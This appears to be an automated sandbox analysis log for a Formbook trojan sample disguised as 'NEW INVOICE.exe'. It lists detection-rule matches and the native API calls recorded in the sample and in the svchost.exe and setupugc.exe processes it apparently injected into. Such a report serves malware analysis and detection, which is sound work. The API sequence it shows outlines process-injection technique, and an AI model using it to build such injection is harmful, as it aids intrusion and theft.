            Source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: NEW INVOICE.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BFE3 NtClose,2_2_0042BFE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,2_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D64340 NtSetContextThread,LdrInitializeThunk,5_2_02D64340
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D64650 NtSuspendThread,LdrInitializeThunk,5_2_02D64650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62AD0 NtReadFile,LdrInitializeThunk,5_2_02D62AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62AF0 NtWriteFile,LdrInitializeThunk,5_2_02D62AF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02D62BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02D62BE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02D62BA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62B60 NtClose,LdrInitializeThunk,5_2_02D62B60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02D62EE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02D62E80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62FE0 NtCreateFile,LdrInitializeThunk,5_2_02D62FE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62FB0 NtResumeThread,LdrInitializeThunk,5_2_02D62FB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62F30 NtCreateSection,LdrInitializeThunk,5_2_02D62F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02D62CA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02D62C70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62C60 NtCreateKey,LdrInitializeThunk,5_2_02D62C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62DD0 NtDelayExecution,LdrInitializeThunk,5_2_02D62DD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02D62DF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02D62D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02D62D30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D635C0 NtCreateMutant,LdrInitializeThunk,5_2_02D635C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D639B0 NtGetContextThread,LdrInitializeThunk,5_2_02D639B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62AB0 NtWaitForSingleObject,5_2_02D62AB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62B80 NtQueryInformationFile,5_2_02D62B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62EA0 NtAdjustPrivilegesToken,5_2_02D62EA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62E30 NtWriteVirtualMemory,5_2_02D62E30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62F90 NtProtectVirtualMemory,5_2_02D62F90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62FA0 NtQuerySection,5_2_02D62FA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62F60 NtCreateProcessEx,5_2_02D62F60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62CC0 NtQueryVirtualMemory,5_2_02D62CC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62CF0 NtOpenProcess,5_2_02D62CF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62C00 NtQueryInformationProcess,5_2_02D62C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62DB0 NtEnumerateKey,5_2_02D62DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D62D00 NtSetInformationFile,5_2_02D62D00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D63090 NtSetValueKey,5_2_02D63090
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D63010 NtOpenDirectoryObject,5_2_02D63010
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D63D70 NtOpenThread,5_2_02D63D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D63D10 NtOpenProcessToken,5_2_02D63D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00378960 NtCreateFile,5_2_00378960
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00378AD0 NtReadFile,5_2_00378AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00378BC0 NtDeleteFile,5_2_00378BC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00378C60 NtClose,5_2_00378C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00378DC0 NtAllocateVirtualMemory,5_2_00378DC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02BFF1C7 NtQueryInformationProcess,NtReadVirtualMemory,5_2_02BFF1C7
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004465660_2_00446566
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_03F74A680_2_03F74A68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F532_2_00417F53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028002_2_00402800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030F02_2_004030F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161332_2_00416133
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011D02_2_004011D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9D32_2_0040F9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DA532_2_0040DA53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401B102_2_00401B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023D72_2_004023D7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023E02_2_004023E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E5D32_2_0042E5D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027F42_2_004027F4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F7B32_2_0040F7B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA3522_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034003E62_2_034003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F02_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E02742_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C02C02_2_033C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA1182_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033301002_2_03330100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C81582_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F41A22_2_033F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034001AA2_2_034001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F81CC2_2_033F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D20002_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033407702_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033647502_2_03364750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C02_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C6E02_2_0335C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033405352_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034005912_2_03400591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E44202_2_033E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F24462_2_033F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EE4F62_2_033EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB402_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F6BD72_2_033F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA802_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033569622_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A02_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340A9A62_2_0340A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334A8402_2_0334A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033428402_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033268B82_2_033268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E8F02_2_0336E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360F302_2_03360F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E2F302_2_033E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03382F282_2_03382F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4F402_2_033B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BEFA02_2_033BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334CFE02_2_0334CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332FC82_2_03332FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEE262_2_033FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340E592_2_03340E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352E902_2_03352E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FCE932_2_033FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEEDB2_2_033FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DCD1F2_2_033DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334AD002_2_0334AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03358DBF2_2_03358DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333ADE02_2_0333ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340C002_2_03340C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0CB52_2_033E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330CF22_2_03330CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A02_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C02_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B16B2_2_0340B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F1722_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337516C2_2_0337516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B02_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F70E92_2_033F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF0E02_2_033FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF0CC2_2_033EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C02_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF7B02_2_033FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033856302_2_03385630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F16CC2_2_033F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F75712_2_033F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034095C32_2_034095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DD5B02_2_033DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF43F2_2_033FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033314602_2_03331460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFB762_2_033FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FB802_2_0335FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B5BF02_2_033B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337DBF92_2_0337DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B3A6C2_2_033B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFA492_2_033FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7A462_2_033F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DDAAC2_2_033DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03385AA02_2_03385AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E1AA32_2_033E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EDAC62_2_033EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D59102_2_033D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033499502_2_03349950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B9502_2_0335B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD8002_2_033AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033438E02_2_033438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFF092_2_033FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFFB12_2_033FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341F922_2_03341F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303FD22_2_03303FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303FD52_2_03303FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03349EB02_2_03349EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7D732_2_033F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F1D5A2_2_033F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343D402_2_03343D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FDC02_2_0335FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B9C322_2_033B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFCF22_2_033FFCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DB02C05_2_02DB02C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DD02745_2_02DD0274
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D3E3F05_2_02D3E3F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DF03E65_2_02DF03E6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEA3525_2_02DEA352
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DC20005_2_02DC2000
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE81CC5_2_02DE81CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DF01AA5_2_02DF01AA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE41A25_2_02DE41A2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DB81585_2_02DB8158
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DCA1185_2_02DCA118
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D201005_2_02D20100
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D4C6E05_2_02D4C6E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D2C7C05_2_02D2C7C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D547505_2_02D54750
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D307705_2_02D30770
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DDE4F65_2_02DDE4F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE24465_2_02DE2446
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DD44205_2_02DD4420
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DF05915_2_02DF0591
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D305355_2_02D30535
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D2EA805_2_02D2EA80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE6BD75_2_02DE6BD7
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEAB405_2_02DEAB40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D5E8F05_2_02D5E8F0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D168B85_2_02D168B8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D3A8405_2_02D3A840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D328405_2_02D32840
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D329A05_2_02D329A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DFA9A65_2_02DFA9A6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D469625_2_02D46962
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEEEDB5_2_02DEEEDB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D42E905_2_02D42E90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DECE935_2_02DECE93
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D30E595_2_02D30E59
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEEE265_2_02DEEE26
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D22FC85_2_02D22FC8
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D3CFE05_2_02D3CFE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DAEFA05_2_02DAEFA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DA4F405_2_02DA4F40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D50F305_2_02D50F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DD2F305_2_02DD2F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D72F285_2_02D72F28
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D20CF25_2_02D20CF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DD0CB55_2_02DD0CB5
